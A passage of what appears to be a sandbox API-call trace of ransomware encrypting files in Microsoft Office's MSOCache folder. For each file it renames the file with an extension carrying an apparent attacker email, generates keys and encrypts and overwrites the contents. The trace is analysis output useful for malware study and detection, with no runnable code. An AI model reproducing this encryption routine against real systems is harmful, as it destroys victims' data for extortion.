Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" [0163.258] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0163.258] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0163.262] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518 [0163.262] GetProcessHeap () returned 0x2e0000 [0163.262] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0163.262] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=21064532) returned 1 [0163.262] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1416b54 [0163.262] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0163.262] GetProcessHeap () returned 0x2e0000 [0163.262] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0163.262] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0163.262] WriteFile (in: hFile=0x518, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0163.265] WriteFile (in: hFile=0x518, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0163.265] WriteFile (in: hFile=0x518, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0163.265] ReadFile (in: hFile=0x518, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1416b54, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1416b54, lpOverlapped=0x0) returned 1 [0164.519] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa6e48910, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xa6e48910, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b15e8 [0164.520] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0164.520] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0164.520] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", dwFileAttributes=0x80) returned 1 [0164.520] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 81 [0164.520] GetProcessHeap () returned 0x2e0000 [0164.520] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x336dd8 [0164.520] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" [0164.520] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0164.521] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0164.524] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0164.524] GetProcessHeap () returned 0x2e0000 [0164.524] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0164.524] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=107912) returned 1 [0164.524] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1a588 [0164.524] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0164.524] GetProcessHeap () returned 0x2e0000 [0164.524] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0164.524] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0164.524] WriteFile (in: hFile=0x51c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0164.526] WriteFile (in: hFile=0x51c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0164.526] WriteFile (in: hFile=0x51c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0164.526] ReadFile (in: hFile=0x51c, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x1a588, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x1a588, lpOverlapped=0x0) returned 1 [0164.529] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa7bd2630, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xa7bd2630, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1628 [0164.530] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0164.530] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0164.530] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", dwFileAttributes=0x80) returned 1 [0164.530] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 89 [0164.530] GetProcessHeap () returned 0x2e0000 [0164.530] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x118) returned 0x319788 [0164.530] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" [0164.530] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0164.530] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0164.533] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0164.533] GetProcessHeap () returned 0x2e0000 [0164.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0164.533] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=596341) returned 1 [0164.533] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x91975 [0164.533] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0164.533] GetProcessHeap () returned 0x2e0000 [0164.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0164.534] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0164.534] WriteFile (in: hFile=0x520, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0164.535] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0164.535] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0164.536] ReadFile (in: hFile=0x520, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x91975, lpOverlapped=0x0) returned 1 [0164.560] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0164.560] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0164.560] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", dwFileAttributes=0x80) returned 1 [0164.561] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 86 [0164.561] GetProcessHeap () returned 0x2e0000 [0164.562] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x112) returned 0x30a498 [0164.562] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" [0164.562] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0164.562] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0164.564] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0164.564] GetProcessHeap () returned 0x2e0000 [0164.564] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0164.564] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=28016276) returned 1 [0164.564] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1ab7e94 [0164.564] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0164.564] GetProcessHeap () returned 0x2e0000 [0164.564] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0164.564] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0164.564] WriteFile (in: hFile=0x520, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0164.568] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0164.568] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0164.568] ReadFile (in: hFile=0x520, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1ab7e94, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1ab7e94, lpOverlapped=0x0) returned 1 [0166.058] SetFilePointer (in: hFile=0x520, lDistanceToMove=-28016276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.058] WriteFile (in: hFile=0x520, lpBuffer=0x4e90020*, nNumberOfBytesToWrite=0x1ab7e94, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x4e90020*, lpNumberOfBytesWritten=0x2acf9c8*=0x1ab7e94, lpOverlapped=0x0) returned 1 [0166.678] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0166.678] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0166.679] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", dwFileAttributes=0x80) returned 1 [0166.688] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 90 [0166.688] GetProcessHeap () returned 0x2e0000 [0166.688] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11a) returned 0x319c88 [0166.688] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" [0166.688] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0166.688] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0166.691] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0166.691] GetProcessHeap () returned 0x2e0000 [0166.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0166.691] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1349) returned 1 [0166.691] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x545 [0166.691] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0166.691] GetProcessHeap () returned 0x2e0000 [0166.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0166.691] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0166.692] WriteFile (in: hFile=0x520, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0166.693] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0166.693] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0166.693] ReadFile (in: hFile=0x520, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x545, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x545, lpOverlapped=0x0) returned 1 [0166.694] SetFilePointer (in: hFile=0x520, lDistanceToMove=-1349, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.694] WriteFile (in: hFile=0x520, lpBuffer=0x31d0730*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0730*, lpNumberOfBytesWritten=0x2acf9c8*=0x545, lpOverlapped=0x0) returned 1 [0166.694] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0166.694] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0166.694] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", dwFileAttributes=0x80) returned 1 [0166.695] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 90 [0166.695] GetProcessHeap () returned 0x2e0000 [0166.695] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11a) returned 0x30a498 [0166.695] lstrcpyW (in: 